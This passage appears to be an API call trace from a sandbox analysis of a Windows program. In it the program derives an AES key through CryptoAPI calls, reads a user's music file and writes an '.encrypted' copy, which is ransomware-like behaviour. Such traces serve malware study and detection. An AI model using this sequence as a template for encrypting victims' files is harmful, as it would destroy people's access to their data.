PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.934] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.934] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0038.934] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.935] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0038.935] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.935] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.935] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0038.935] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.935] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.935] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.935] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.935] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.935] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0038.935] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.935] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0038.936] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.936] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.936] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0038.936] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.936] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.936] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.936] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.936] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.936] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.936] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.936] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.936] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.936] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.937] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.937] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.937] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0038.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.937] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.937] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.937] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.937] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.937] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.937] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.937] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.937] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.937] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.937] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.937] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.937] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.937] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.937] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.937] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.938] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0038.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.938] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0038.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.938] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.938] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.938] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.938] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0038.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.938] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.938] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.938] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.938] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.939] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.939] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0038.939] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.939] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.939] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.939] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.939] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.939] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.939] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0038.939] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.939] CryptDestroyHash (hHash=0x7c2100) returned 1 [0038.939] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.939] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.939] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.939] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.939] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.939] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\bt6e6z.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.939] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.939] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0038.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0038.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0038.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0038.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.940] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0038.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0038.940] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.940] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0038.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0038.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0038.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0038.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0038.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0038.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0038.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0038.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0038.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0038.942] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc")) returned 0x10 [0038.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0038.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0038.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0038.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.942] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.encrypted.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\bt6e6z.encrypted.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0038.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0038.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0038.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.943] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0038.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0038.943] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0038.943] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0038.943] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0038.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0038.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.943] RtlAllocateHeap 